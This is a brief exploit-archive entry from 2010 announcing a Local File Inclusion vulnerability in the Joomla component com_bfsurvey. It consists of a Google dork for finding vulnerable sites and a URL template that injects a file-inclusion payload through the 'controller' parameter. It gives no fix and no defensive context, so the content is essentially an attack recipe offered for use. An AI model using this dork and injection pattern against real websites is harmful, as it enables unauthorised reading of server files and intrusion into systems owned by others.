[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_bfsurvey LFI Vulnerability
# Published : 2010-01-03
# Author : FL0RiX
# Previous Title : Joomla Component com_bfsurvey_pro (catid) Blind SQL Injection Exploit
# Next Title : Joomla Component com_abbrev Local File Inclusion Vulnerability


@~~=======================================~~@
@~~=Script   : Joomla Component com_bfsurvey

@~~=Author   : FL0RiX

@~~=HomePage: www.oltan.org

@~~=Greez  : Deep-Power ,Pyske,Wretch-x & All Friends

@~~=Bug Type : Local File Inlusion(LFI)

@~~=Dork : inurl:"com_bfsurvey"

@~~=======================================~~@

@~~=Vuln

: http://site/ [Yol] /index.php?option=com_bfsurvey&controller= [-LFI-]